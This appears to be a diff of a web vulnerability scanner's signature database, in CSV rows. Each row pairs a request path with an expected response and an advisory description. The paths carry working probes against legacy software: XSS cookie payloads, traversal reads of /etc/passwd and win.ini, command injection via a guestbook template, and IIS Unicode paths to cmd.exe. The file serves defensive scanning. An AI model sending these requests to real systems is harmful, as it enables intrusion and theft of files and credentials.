"003080","3416","7","@CGIDIRSGWWEB.EXE?HELP=bad-request","GET","Could not find file SYS","","","","","Groupwise allows system information and file retrieval by modifying arguments to the help system.","","" 3079 "003081","3417","4","/examplesWebApp/InteractiveQuery.jsp?person=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","BEA WebLogic 8.1 and below are vulnerable to Cross Site Scripting (XSS) in example code. CVE-2003-0624. CA-2000-02.","",""3079 "003081","3417","4","/examplesWebApp/InteractiveQuery.jsp?person=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","BEA WebLogic 8.1 and below are vulnerable to Cross Site Scripting (XSS) in example code. CVE-2003-0624. CA-2000-02.","","" 3080 3080 "003082","3423","3","/XSQLConfig.xml","GET","200","","","","","Oracle 9iAS configuration file found - see bugtraq #4290.","","" 3081 "003083","3458","4","/sgdynamo.exe?HTNAME=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Ecometry's SGDynamo is vulnerable to Cross Site Scripting (XSS). CVE-2002-0375. CA-2000-02.","",""3082 "003084","3483","3","/docs/<script>alert('Vulnerable');</script>","GET","<script>alert ('Vulnerable');</script>","","","","","Nokia Electronic Documentation is vulneable to Cross Site Scripting (XSS). CVE-2003-0801.","",""3083 "003085","3484","3","/docs/NED?action=retrieve&location=.","GET","docs\ ned","","","","","Nokia Electronic Documentation allows directory listings and reveals its installation path. CVE-2003-0802.","",""3084 "003086","3486","4","/aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Aktivate Shopping Cart 1.03 and lower are vulnerable to Cross Site Scripting (XSS). http://www.allen0keul.com/aktivate/ CVE-2001-1212, CA-2000-02.","",""3081 "003083","3458","4","/sgdynamo.exe?HTNAME=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Ecometry's SGDynamo is vulnerable to Cross Site Scripting (XSS). CVE-2002-0375. CA-2000-02.","","" 3082 "003084","3483","3","/docs/<script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\);<\/script>","","","","","Nokia Electronic Documentation is vulneable to Cross Site Scripting (XSS). CVE-2003-0801.","","" 3083 "003085","3484","3","/docs/NED?action=retrieve&location=.","GET","docs\\ned","","","","","Nokia Electronic Documentation allows directory listings and reveals its installation path. CVE-2003-0802.","","" 3084 "003086","3486","4","/aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Aktivate Shopping Cart 1.03 and lower are vulnerable to Cross Site Scripting (XSS). http://www.allen0keul.com/aktivate/ CVE-2001-1212, CA-2000-02.","","" 3085 3085 "003087","3487","d","/lcgi/ndsobj.nlm","GET","SCRIPT_NAME","","","","","Novell Netware 5.1 contains a buffer overflow, also, if Groupwise is enabled remote enumeration of users, groups and system information might be possible.CVE-2001-1233","","" 3086 3086 "003088","3489","3","/surf/scwebusers","GET","200","","","","","SurfControl SuperScout Web Reports Server user and password file is available. CVE-2002-0705.","","" … … 3113 3113 "003115","3590","7","@CGIDIRSFileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=","GET","root:","","","","","FileSeek allows arbitrary files to be retrieved. Update to the latest version from cgi-perl.com","","" 3114 3114 "003116","3591","b","/project/index.php?m=projects&user_cookie=1","GET","200","","","","","dotProject 0.2.1.5 may allow admin login bypass by adding the user_cookie=1 to the URL.","","" 3115 "003117","3632","4","/webcalendar/colors.php?color=</script><script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Webcalendar 0.9.42 and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3116 "003118","3633","4","/webcalendar/week.php?user=\"><script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Webcalendar 0.9.42 and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3115 "003117","3632","4","/webcalendar/colors.php?color=</script><script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Webcalendar 0.9.42 and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3116 "003118","3633","4","/webcalendar/week.php?user=\"><script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Webcalendar 0.9.42 and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3117 3117 "003119","369","3","/active.log","GET","WEBactive Http Server","","","","","The WebActive log is accessible remotely.","","" 3118 3118 "003120","3761","7","/?pattern=/etc/*&sort=name","GET","passwd","","hosts","","","The TCLHttpd 3.4.2 server allows directory listings via dirlist.tcl.","","" 3119 3119 "003121","3761","7","/images/?pattern=/etc/*&sort=name","GET","passwd","","hosts","","","The TCLHttpd 3.4.2 server allows directory listings via dirlist.tcl.","","" 3120 "003122","3762","4","/debug/dbg?host==<script>alert('Vulnerable');</script>","GET","<script>alert ('Vulnerable');</script>","","","","","The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts. CA-2000-02.","",""3121 "003123","3762","4","/debug/echo?name=<script>alert('Vulnerable');</script>","GET","<script>alert ('Vulnerable');</script>","","","","","The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts. CA-2000-02.","",""3122 "003124","3762","4","/debug/errorInfo?title===<script>alert('Vulnerable');</script>","GET","<script>alert ('Vulnerable');</script>","","","","","The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts. CA-2000-02.","",""3123 "003125","3762","4","/debug/showproc?proc===<script>alert('Vulnerable');</script>","GET","<script>alert ('Vulnerable');</script>","","","","","The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts.","",""3120 "003122","3762","4","/debug/dbg?host==<script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\);<\/script>","","","","","The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts. CA-2000-02.","","" 3121 "003123","3762","4","/debug/echo?name=<script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\);<\/script>","","","","","The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts. CA-2000-02.","","" 3122 "003124","3762","4","/debug/errorInfo?title===<script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\);<\/script>","","","","","The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts. CA-2000-02.","","" 3123 "003125","3762","4","/debug/showproc?proc===<script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\);<\/script>","","","","","The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts.","","" 3124 3124 "003126","379","8","/site/eg/source.asp","GET","200","","","","","This ASP (installed with Apache::ASP) allows attackers to upload files to the server. Upgrade to 1.95 or higher. CVE-2000-0628.","","" 3125 3125 "003127","3800","7","@PHPMYADMINexport.php?what=../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","phpMyAdmin is vulnerable to a directory traversal attack.","","" … … 3135 3135 "003137","4161","2","/data/userlog/log.txt","GET","200","","","","","Teekai's Tracking Online 1.0 log can be retrieved remotely.","","" 3136 3136 "003138","4161","2","/userlog.php","GET","200","","","","","Teekai's Tracking Online 1.0 log can be retrieved remotely.","","" 3137 "003139","4164","7","/internal.sws?../../../../../../../../winnt/win.ini","GET"," [fonts]","","","","","Snowblind Web Server v1.0 allows arbitrary files to be retrieved from the remote server.","",""3138 "003140","4164","7","/internal.sws?../../../../../../../../winnt/win.ini","GET"," [windows]","","","","","Snowblind Web Server v1.0 allows arbitrary files to be retrieved from the remote server.","",""3139 "003141","4165","7","/internal.sws?.../.../.../.../.../.../.../.../winnt/win.ini","GET"," [fonts]","","","","","Snowblind Web Server v1.0 allows arbitrary files to be retrieved from the remote server.","",""3140 "003142","4165","7","/internal.sws?.../.../.../.../.../.../.../.../winnt/win.ini","GET"," [windows]","","","","","Snowblind Web Server v1.0 allows arbitrary files to be retrieved from the remote server.","",""3137 "003139","4164","7","/internal.sws?../../../../../../../../winnt/win.ini","GET","\[fonts\]","","","","","Snowblind Web Server v1.0 allows arbitrary files to be retrieved from the remote server.","","" 3138 "003140","4164","7","/internal.sws?../../../../../../../../winnt/win.ini","GET","\[windows\]","","","","","Snowblind Web Server v1.0 allows arbitrary files to be retrieved from the remote server.","","" 3139 "003141","4165","7","/internal.sws?.../.../.../.../.../.../.../.../winnt/win.ini","GET","\[fonts\]","","","","","Snowblind Web Server v1.0 allows arbitrary files to be retrieved from the remote server.","","" 3140 "003142","4165","7","/internal.sws?.../.../.../.../.../.../.../.../winnt/win.ini","GET","\[windows\]","","","","","Snowblind Web Server v1.0 allows arbitrary files to be retrieved from the remote server.","","" 3141 3141 "003143","4171","2","/ASP/cart/database/metacart.mdb","GET","200","","","","","MetaCart2 is an ASP shopping cart. The database of customers is available via the web.","","" 3142 3142 "003144","4171","2","/database/metacart.mdb","GET","200","","","","","MetaCart2 is an ASP shopping cart. The database of customers is available via the web.","","" … … 3146 3146 "003148","4171","2","/shoponline/fpdb/shop.mdb","GET","200","","","","","MetaCart2 is an ASP shopping cart. The database of customers is available via the web.","","" 3147 3147 "003149","4171","2","/shopping/database/metacart.mdb","GET","200","","","","","MetaCart2 is an ASP shopping cart. The database of customers is available via the web.","","" 3148 "003150","4174","4","/search.php?sess=your_session_id&lookfor=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","phPay v2.02 cross site scripting. http://phpay.sourceforge.net/.","",""3148 "003150","4174","4","/search.php?sess=your_session_id&lookfor=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","phPay v2.02 cross site scripting. http://phpay.sourceforge.net/.","","" 3149 3149 "003151","35877","3","/admin/phpinfo.php","GET","PHP Version","","","","","Immobilier allows phpinfo() to be run.","","" 3150 3150 "003152","4176","3","/start.php?config=alper.inc.php","GET","Failed opening required","","","","","phPay v2.02 information disclosure. http://phpay.sourceforge.net/.","","" … … 3154 3154 "003156","4220","8","@CGIDIRSguestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd|","GET","root:","","","","","cpanel's guestbook.cgi allows any command to be executed on the remote server. Remove /usr/local/cpanel/cgi-sys/guestbook.cgi or update to a new version of cpanel.","","" 3155 3155 "003157","4231","3","/JUNK(5).xml","GET","file:","","","","","Coccoon from Apache-XML project reveals file system path in error messages.","","" 3156 "003158","4231","3","/JUNK(5)/","GET","FileNotFoundException: /","","","","","Coccoon 2.1.4 from Apache-XML project reveals file system path in error messages.","",""3156 "003158","4231","3","/JUNK(5)/","GET","FileNotFoundException: \/","","","","","Coccoon 2.1.4 from Apache-XML project reveals file system path in error messages.","","" 3157 3157 "003159","4233","1","/cgi-bin/main_menu.pl","GET","NetDetector Traffic Analysis","","","","","The NetDetector allows unauthenticated users to perform database queries.","","" 3158 3158 "003160","4237","2","/ban.bak","GET","200","","","","","Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.","","" … … 3163 3163 "003165","4239","2","/admin/datasource.asp","GET","200","","","","","Xpede page reveals SQL account name. The /admin directory should be protected.","","" 3164 3164 "003166","4240","9","/utils/sprc.asp","GET","200","","","","","Xpede page may allow SQL injection.","","" 3165 "003167","4241","2","/reports/temp/","GET"," index of ","","","","","Xpede reports directory should not be browsable.","",""3165 "003167","4241","2","/reports/temp/","GET","[Ii]ndex [Oo]f ","","","","","Xpede reports directory should not be browsable.","","" 3166 3166 "003168","4245","3","@CGIDIRSrtm.log","GET","HttpPost Retry","","","","","Rich Media's JustAddCommerce allows retrieval of a log file, which may contain sensitive information.","","" 3167 3167 "003169","4261","3","@CGIDIRSVsSetCookie.exe?","GET","200","","","","","A flaw in VsSetCookie.exe may allow attackers to guess a correct user name & gain access to the Lucent system.","","" 3168 "003170","4262","4","/addressbook.php?\"><script>alert(Vulnerable)</script><!--","GET","<script>alert (Vulnerable)</script>","","","","","Squirrel Mail 1.2.7 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3168 "003170","4262","4","/addressbook.php?\"><script>alert(Vulnerable)</script><!--","GET","<script>alert\(Vulnerable\)<\/script>","","","","","Squirrel Mail 1.2.7 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3169 3169 "003171","4263","4","/options.php?optpage=<script>alert('Vulnerable!')</script>","GET","include_path","","","","","This Squirrel Mail 1.2.7 reveals the PHP path information in error messages.","","" 3170 3170 "003172","4264","4","/search.php?mailbox=INBOX&what=x&where=<script>alert('Vulnerable!')</script>&submit=Search","GET","include_path","","","","","This Squirrel Mail 1.2.7 reveals the PHP path information in error messages.","","" 3171 "003173","4265","4","/help.php?chapter=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Squirrel Mail 1.2.7 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3172 "003174","4266","4","/src/read_body.php?mailbox=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&passed_id=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&startMessage=1&show_more=0","GET","<script>alert (Vulnerable)</script>","","","","","Squirrel Mail is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3171 "003173","4265","4","/help.php?chapter=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Squirrel Mail 1.2.7 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3172 "003174","4266","4","/src/read_body.php?mailbox=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&passed_id=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&startMessage=1&show_more=0","GET","<script>alert\(Vulnerable\)<\/script>","","","","","Squirrel Mail is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3173 3173 "003175","4300","7","@CGIDIRSpowerup/r.cgi?FILE=../../../../../../../../../../etc/passwd","GET","root:","","","","","The Powerup CGI allows attackers to read any file on the system.","","" 3174 3174 "003176","4300","7","@CGIDIRSr.cgi?FILE=../../../../../../../../../../etc/passwd","GET","root:","","","","","The Powerup CGI allows attackers to read any file on the system.","","" … … 3181 3181 "003183","4314","3","/texis.exe/?-version","GET","200","","","","","Texis installation may reveal sensitive information.","","" 3182 3182 "003184","435","7","@CGIDIRSapexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/","GET","root:","","","","","This allows attackers to read arbitrary files from the server. CVE-2000-0975. BID-2338.","","" 3183 "003185","4356","4","/acart2_0/deliver.asp?msg=<script>alert(\"test\")</script>","GET","<script>alert (\"test\")</script>","","","","","Alan Ward A-Cart 2.0 contains several XSS vulnerabilities","",""3184 "003186","4357","4","/acart2_0/error.asp?msg=<script>alert(\"test\")</script>","GET","<script>alert (\"test\")</script>","","","","","Alan Ward A-Cart 2.0 contains several XSS vulnerabilities","",""3185 "003187","4358","4","/acart2_0/admin/error.asp?msg=<script>alert(\"test\")</script>","GET","<script>alert (\"test\")</script>","","","","","Alan Ward A-Cart 2.0 contains several XSS vulnerabilities","",""3186 "003188","4359","4","/acart2_0/admin/index.asp?msg=<script>alert(\"test\")</script>","GET","<script>alert (\"test\")</script>","","","","","Alan Ward A-Cart 2.0 contains several XSS vulnerabilities","",""3183 "003185","4356","4","/acart2_0/deliver.asp?msg=<script>alert(\"test\")</script>","GET","<script>alert\(\"test\"\)<\/script>","","","","","Alan Ward A-Cart 2.0 contains several XSS vulnerabilities","","" 3184 "003186","4357","4","/acart2_0/error.asp?msg=<script>alert(\"test\")</script>","GET","<script>alert\(\"test\"\)<\/script>","","","","","Alan Ward A-Cart 2.0 contains several XSS vulnerabilities","","" 3185 "003187","4358","4","/acart2_0/admin/error.asp?msg=<script>alert(\"test\")</script>","GET","<script>alert\(\"test\"\)<\/script>","","","","","Alan Ward A-Cart 2.0 contains several XSS vulnerabilities","","" 3186 "003188","4359","4","/acart2_0/admin/index.asp?msg=<script>alert(\"test\")</script>","GET","<script>alert\(\"test\"\)<\/script>","","","","","Alan Ward A-Cart 2.0 contains several XSS vulnerabilities","","" 3187 3187 "003189","436","7","@CGIDIRSsensepost.exe?/c+dir","GET","200","","","","","The presence of sensepost.exe indicates the system is/was vulnerable to a Unicode flaw and was compromised with a test script from SensePost. The sensepost.exe allows command execution (it is a copy of cmd.exe), as did the original unicode exploit (see ht","","" 3188 3188 "003190","436","8","/certsrv/..%c0%af../winnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS Unicode command exec problem, see http://www.wiretrip.net/rfp/p/doc.asp?id=57&face=2 and http://www.securitybugware.org/NT/1422.html. CVE-2000-0884","","" … … 3194 3194 "003196","436","8","/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS Unicode command exec problem, see http://www.wiretrip.net/rfp/p/doc.asp?id=57&face=2 and http://www.securitybugware.org/NT/1422.html. CVE-2000-0884","","" 3195 3195 "003197","436","8","/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS Unicode command exec problem, see http://www.wiretrip.net/rfp/p/doc.asp?id=57&face=2 and http://www.securitybugware.org/NT/1422.html. CVE-2000-0884","","" 3196 "003198","436","8","/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\"","GET","boot .ini","","","","","IIS Unicode command exec problem, see http://www.wiretrip.net/rfp/p/doc.asp?id=57&face=2 and http://www.securitybugware.org/NT/1422.html. CVE-2000-0884","",""3196 "003198","436","8","/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\"","GET","boot\.ini","","","","","IIS Unicode command exec problem, see http://www.wiretrip.net/rfp/p/doc.asp?id=57&face=2 and http://www.securitybugware.org/NT/1422.html. CVE-2000-0884","","" 3197 3197 "003199","436","8","/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS Unicode command exec problem, see http://www.wiretrip.net/rfp/p/doc.asp?id=57&face=2 and http://www.securitybugware.org/NT/1422.html. CVE-2000-0884","","" 3198 3198 "003200","4360","2","/acart2_0/acart2_0.mdb","GET","200","","","","","Alan Ward A-Cart 2.0 allows remote user to read customer database file which may contain usernames, passwords, credit cards and more.","","" … … 3213 3213 "003215","497","3","/inc/sendmail.inc","GET","This program is free software","","","","","Basilix allows its configuration files to be downloaded, which may include the mysql auth credentials.","","" 3214 3214 "003216","5089","8","/admin/system.php3?cmd=cat%20/etc/passwd","GET","root:","","","","","DotBr 0.1 allows remote command execution.","","" 3215 "003217","5089","8","/admin/system.php3?cmd=dir%20c:\\","GET","boot .ini","","","","","DotBr 0.1 allows remote command execution.","",""3215 "003217","5089","8","/admin/system.php3?cmd=dir%20c:\\","GET","boot\.ini","","","","","DotBr 0.1 allows remote command execution.","","" 3216 3216 "003218","5090","8","/admin/exec.php3?cmd=cat%20/etc/passwd","GET","root:","","","","","DotBr 0.1 allows remote command execution.","","" 3217 "003219","5090","8","/admin/exec.php3?cmd=dir%20c:\\","GET","boot .ini","","","","","DotBr 0.1 allows remote command execution.","",""3217 "003219","5090","8","/admin/exec.php3?cmd=dir%20c:\\","GET","boot\.ini","","","","","DotBr 0.1 allows remote command execution.","","" 3218 3218 "003220","5091","3","/foo.php3","GET","PHP Version","","","","","DotBr 0.1 has a phpinfo() script called foo.php3.","","" 3219 3219 "003221","5092","3","/config.inc","GET","200","","","","","DotBr 0.1 configuration file includes usernames and passwords.","","" … … 3222 3222 "003224","5095","3","/sysuser/docmgr/ieedit.stm?url=../","GET","200","","","","","Sambar default file may allow directory listings.","","" 3223 3223 "003225","5096","3","/sysuser/docmgr/iecreate.stm?template=../","GET","200","","","","","Sambar default file may allow directory listings.","","" 3224 "003226","5097","4","/wwwping/index.stm?wwwsite=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3225 "003227","5098","4","/sysuser/docmgr/create.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3226 "003228","5098","4","/sysuser/docmgr/edit.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3227 "003229","5098","4","/sysuser/docmgr/ftp.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3228 "003230","5098","4","/sysuser/docmgr/htaccess.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3229 "003231","5098","4","/sysuser/docmgr/iecreate.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3230 "003232","5098","4","/sysuser/docmgr/ieedit.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3231 "003233","5098","4","/sysuser/docmgr/info.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3232 "003234","5098","4","/sysuser/docmgr/mkdir.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3233 "003235","5098","4","/sysuser/docmgr/rename.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3234 "003236","5098","4","/sysuser/docmgr/search.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3235 "003237","5098","4","/sysuser/docmgr/sendmail.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3236 "003238","5098","4","/sysuser/docmgr/template.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3237 "003239","5098","4","/sysuser/docmgr/update.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3238 "003240","5098","4","/sysuser/docmgr/vccheckin.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3239 "003241","5098","4","/sysuser/docmgr/vccreate.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3240 "003242","5098","4","/sysuser/docmgr/vchist.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3241 "003243","5099","4","/sysuser/docmgr/edit.stm?name=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3242 "003244","5099","4","/sysuser/docmgr/ieedit.stm?name=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3243 "003245","5099","4","/sysuser/docmgr/info.stm?name=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3244 "003246","5099","4","/sysuser/docmgr/rename.stm?name=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3245 "003247","5099","4","/sysuser/docmgr/sendmail.stm?name=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3246 "003248","5099","4","/sysuser/docmgr/update.stm?name=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3247 "003249","5099","4","/sysuser/docmgr/vccheckin.stm?name=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3248 "003250","5099","4","/sysuser/docmgr/vccreate.stm?name=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3249 "003251","5099","4","/sysuser/docmgr/vchist.stm?name=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3250 "003252","5100","4","@CGIDIRStestcgi.exe?<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3251 "003253","5101","4","@CGIDIRSenviron.pl?param1=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3252 "003254","5102","4","/syshelp/stmex.stm?foo=123&bar=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3253 "003255","5102","4","/syshelp/stmex.stm?foo=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","&bar=456",""3254 "003256","5103","4","/syshelp/cscript/showfunc.stm?func=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3255 "003257","5104","4","/syshelp/cscript/showfncs.stm?pkg=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3256 "003258","5105","4","/syshelp/cscript/showfnc.stm?pkg=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3257 "003259","5106","4","/netutils/ipdata.stm?ipaddr=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3258 "003260","5107","4","/netutils/findata.stm?host=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3259 "003261","5107","4","/netutils/findata.stm?user=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3260 "003262","5108","4","/sysuser/docmgr/search.stm?query=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3224 "003226","5097","4","/wwwping/index.stm?wwwsite=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3225 "003227","5098","4","/sysuser/docmgr/create.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3226 "003228","5098","4","/sysuser/docmgr/edit.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3227 "003229","5098","4","/sysuser/docmgr/ftp.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3228 "003230","5098","4","/sysuser/docmgr/htaccess.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3229 "003231","5098","4","/sysuser/docmgr/iecreate.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3230 "003232","5098","4","/sysuser/docmgr/ieedit.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3231 